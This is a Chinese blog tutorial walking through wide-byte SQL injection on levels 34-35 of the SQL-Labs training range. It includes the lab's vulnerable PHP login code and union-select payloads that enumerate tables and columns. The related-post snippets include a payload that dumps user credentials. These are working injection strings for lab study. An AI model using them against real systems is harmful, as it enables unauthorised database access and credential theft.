SQL-Labs靶场“34-35”关通关教程

原创 已于 2024-07-25 12:06:15 修改 · 2.8k 阅读 · 36 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #vscode #php #网络安全 #渗透测试 #Web安全

于 2024-03-18 06:51:55 首次发布

君衍.


SQL-Labs靶场通关教程:

SQL注入第一课

SQL无列名注入

SQL报错注入原理

简单的SQL练习,联合注入、报错注入

POST提交方式注入

HTTP头部注入

二次注入

一些绕过案例

HTTP参数污染攻击

一、34关 POST单引号宽字节注入

请求方式 注入类型 拼接方式
POST 联合、报错、布尔盲注、延时盲注 username=‘$uname’

本关其实与33关相似,只是使用POST进行传参,过滤方法与33关一致,所以解法也差不多,首先我们依旧是进行测试查看回显:
在这里插入图片描述
可以看到uname以及passwd都进行了过滤,所以我们其实依旧可以使用宽字节注入,下面查看源码。

1、源码分析

<?php
//including the Mysql connect parameters.
include("../sql-connections/sqli-connect.php");
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
	$uname1=$_POST['uname'];
	$passwd1=$_POST['passwd'];
        //echo "username before addslashes is :".$uname1 ."<br>";
        //echo "Input password before addslashes is : ".$passwd1. "<br>";
	//logging the connection parameters to a file for analysis.
	$fp=fopen('result.txt','a');
	fwrite($fp,'User Name:'.$uname1);
	fwrite($fp,'Password:'.$passwd1."\n");
	fclose($fp);
        $uname = addslashes($uname1);
        $passwd= addslashes($passwd1);
        //echo "username after addslashes is :".$uname ."<br>";
        //echo "Input password after addslashes is : ".$passwd;
	// connectivity 
	mysqli_query($con1, "SET NAMES gbk");
	@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
	$result=mysqli_query($con1, $sql);
	$row = mysqli_fetch_array($result, MYSQLI_BOTH);
	if($row)
	{
		···
		echo 'Your Login name:'. $row['username'];
		···
		echo 'Your Password:' .$row['password'];
		···
  	}
	else  
	{
		···
		//echo "Try again looser";
		print_r(mysqli_error($con1));
		···
	}
}
?>

这里我们只需要看以下代码:

$uname = addslashes($uname1);
$passwd= addslashes($passwd1);

使用 addslashes 函数对用户名和密码进行转义处理。剩下的代码与第32关相同。依旧是查询到的话输出查询到的信息,查不到的话输出报错信息,所以联合查询以及报错注入依旧可以尝试使用。
在这里插入图片描述
所以我们使用Burp抓包进行测试,抓包发送到重发器中完成注入。

2、联合查询注入

1、猜字段数

uname=1%df' order by 3#&passwd=1&submit=Submit

在这里插入图片描述
我们可以看到没有第三列,所以我们为2列。

2、测试观察回显内容

uname=-1%df' union select 1,2#&passwd=1&submit=Submit

在这里插入图片描述

3、爆出数据库中所有表的名称

uname=-1%df' union select  1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit

在这里插入图片描述

4、爆出数据库中表的列名

uname=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x656D61696C73#&passwd=1&submit=Submit

在这里插入图片描述
同样的,上面是使用十六进制进行查询,下面我们使用子查询进行查询。

uname=
最低0.47元/天 解锁文章

200万优质内容无限畅学
Sqli-labs靶场详细攻略Less 34-37
qq_41755084的博客
10-31 1136
这一还是进行宽字节注入,与上一的区别在于使用了post方法进行传递。先试一下上一的注入代码。因为这一是登录,就使用之前的dumb账号。登陆失败了,也没报错,看一下这个包传递时post方法里参数是咋传的。可以看到,我们输入的注入代码在前端被进行了一个url编码,%被编码成了%25,原来的空格被替换成了+,原来的+被替换成了%2b那我们再把这个包改回来就好,+不用改回空格,在服务端会改回来的。并且经过尝试,这里的列数为2。注入成功。
SQL-Labs靶场“36-37”通关教程
钟言的博客
03-19 3722
本篇为SQL-Labs靶场的36到37通关教程,详细内容包含了:一、36 GET单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入37POST单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入等内容
SQL-labs的第34——报错注入 宽字节注入(POST)
qq_73393033的博客
08-09 565
我们发现该网站会返回报错信息,直接使用报错注入吧。发现该还是会向危险字符自动添加斜杠。截取数据包,进行注入,输入语句。出现报错,说明单引号逃逸成功。我们发现无法中和反斜杠。
sqli-labs/Less-34
m0_71299382的博客
11-21 438
sqli-labs第三十四
SQLi LABS Less-34 报错注入
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLi 第三十八 SQLi38
sqli-labs(34)
weixin_30611509的博客
06-01 733
0x01构造闭合 同样 发现 ’被注释掉了 试探了一波发现什么信息都不会返回 正确错误的页面都一样 之前我们的方法就是将过滤函数添加的 \ 给吃掉。而get型的方式我们是以url形式提交的,因此数据会通过URLencode,如何将方法用在post型的注入当中,我们此处介绍一个新的方法。将utf-8转换为utf-16或 utf-32,例如将 ' 转为utf-16为�' ...
sqli-labs靶场通关攻略(31-35
Nai_zui_jiang的博客
08-26 593
使用Burpsuite抓包,在登录的时候抓,然后发送到repeater。本使用addslashes函数对于账户和密码都进行转义。
SQL-Labs靶场“46-50”通关教程
钟言的博客
02-24 1万+
本篇为SQL-Labs靶场的第46到50教程,详细内容包含了:四十六 ORDER BY数字型注入 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 5、报错注入 6、Limit注入 四十七 ORDER BY单引号报错注入 1、源码分析 2、报错注入 3、时间盲注 三、四十八 ODRER BY数字型盲注 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 四、四十九 ORDER BY单引号盲注1、源码分析 2、时间盲注 五、五十 ORDER BY数字型堆叠注等
Sql-labs 靶场搭建及通关
最新发布
m0_74825074的博客
01-21 1291
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。该语句的意思是查询information_schema数据库下的columns表里面且table_users字段内容是users的所有column_name的内。爆出库是 ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test。
SQLI LABS | Less-34 POST-Bypass AddSlashes()
Blue17 の 小窝
11-09 575
所以,接下来的测试,就只能在 BurpSuite 中进行啦。根据上面爆破出来的模板,我们可以修改其 Payload,伪造任意用户来进行登录(当然,也可以对这个接口进行布尔盲注。但是该 Payload 只能在 BurpSuite 的 Repeater 中使用。可以看到,我们已经成功获取了当前站点使用的后端数据库的信息。至此,SQLI LABS Less-34 POST-Bypass AddSlashes() 成功过。本是 POST 型注入,问题不大,原理是一样的。
sqli-labs (less-34)
kukudeshuo的博客
03-14 2072
sqli-labs (less-34) 进入34,我们发现又回到了我们熟悉的页面,我们直接输入用户名和密码登入进去 像之前的卡一样,我们输入的用户名和密码也是使用POST的方式传输到了服务器,所以我们继续使用hackbar工具抓取POST内容 在用户名的位置我们输入一个单引号试试,结果发现单引号被转义 那我们在密码的位置尝试输入一个单引号试试,结果发现也被转义 这里一般情况下就已经没有注入点了,但我们可以查看源代码看看这是不是也使用了GBK编码 查看源代码可知确实使用了GBK编码,那就很简单
sqli-labs34
weixin_46023655的博客
08-06 629
sqli-labs34
sqlilabs第三十四三十五
m0_73248913的博客
12-25 701
但是注意一下get方式是会经过url编码的,但是post是不会编码的,我们可以使用utf-8转换成utf-16或者utf-32(利用%bb)接下来就是和之前一样了(注意1=1也可以成功)和之前一样的只是变成了post。注意查字段的时候需要使用盲注。(写掉了单引号后面发现了)一样只是变成post。
Sqli-labs之Less-34
→_→
05-02 2572
Less-34 基于错误_POST_单引号_字符型_addslashes()_宽字节注入 《注入天书》中介绍因 POST 不能进行 URLencode,可使用 UTF-8 转 UTF-16 或 UTF-32,实践中发现正常的宽字节注入仍有效,猜测是编码的问题,待解决。 一个参考:...
sql-labs32~37
qq_44663230的博客
09-04 2438
sql-labs32~37 宽字节注入集合
sqli-lab卡记录
插销丸的博客
04-08 321
直接上 Less-1 通过‘‘1’’LIMIT 0,1’ 立即推理,‘1’‘LIMIT 0,1 分析格式为select from…where id=’?’ 加注释–+,验证成功 判断字段数为3 直接爆库 0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=d...
sqli-labs详细全解31-40
qq_38415434的博客
01-11 1049
sqli-labs详细全解31-40 第三十一: login.php 只对第一个参数进行了检测,而第二个参数并没有进行过滤。 payload:id=2&amp;amp;amp;id=1&amp;quot;) and 1=12-- - 第三十二: f
sqli-labs————Less-34(宽字节绕过、水平越权、盲注)
Fly_鹏程万里
05-19 2713
Less-34方法一:这一是POST型的注入,同样的将post传递过来的内容进行了转义处理,过滤了单引号、反斜杠。有之前的例子我们可以看到%df可以将转义的反斜杠给吃掉。而GET型的方式我们是以url形式提交的,因此数据会通过urlencode,如何将方法用在POST型的注入当中呢?我们可以将UTF-8转换为UTF-16或者UTF-32,例如将'转换为utf-16为: �'。我们可以利用这一点注...
JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞_jeeplus快速开发平台 漏洞(1)
2301_77033340的博客
04-15 657
【代码】JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞_jeeplus快速开发平台 漏洞(1)
sql-labs靶场通关
01-13
### SQL注入实验环境 sqli-labs 靶场解题思路 #### less17: Union 注入基础 Union查询是一种常见的SQL注入手法,通过`UNION SELECT`语句可以将额外的数据集附加到原始查询的结果集中。为了成功执行这种攻击,两个查询返回的列数必须相同,并且数据类型的兼容性也要匹配。 对于less17来说,目标是在存在漏洞的应用程序参数中构造有效的payload来获取敏感信息。例如,在给定条件下可以通过如下方式尝试读取当前使用的数据库名称: ```sql ?id=-1' UNION SELECT 1,database() -- ``` 上述命令利用了闭合单引号后的逻辑错误并追加了一个新的SELECT子句[^1]。 #### 获取MySQL版本与数据库名 进一步探索时,除了了解正在操作哪个具体的数据库外,知道服务器上运行的是哪一个版本也是非常有用的。这有助于判断可能存在的特定弱点或特性。下面是一个用于同时检索这两个值的例子: ```sql ?id=-1' UNION SELECT 1,CONCAT(version(),'|',database()) -- ``` 此表达式会连接MySQL版本字符串和活动库的名字作为第二列的内容输出[^2]。 #### 枚举用户名密码哈希值 一旦掌握了足够的背景知识之后就可以转向更深入的信息挖掘工作——比如从用户表里提取账户凭证。这里展示了一种方法用来列举所有用户的登录凭据(假设字段名为username,password),并且用特殊字符分隔开它们以便于解析: ```sql ?id=-1' UNION SELECT 1,GROUP_CONCAT(username,'~',password) FROM users -- ``` 这段代码将会把所有的用户名及其对应的散列形式的口令组合成单一字符串返回给调用者[^4]。 请注意,以上内容仅限学习研究目的使用;实际环境中未经授权擅自访问他人计算机信息系统属于违法行为!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值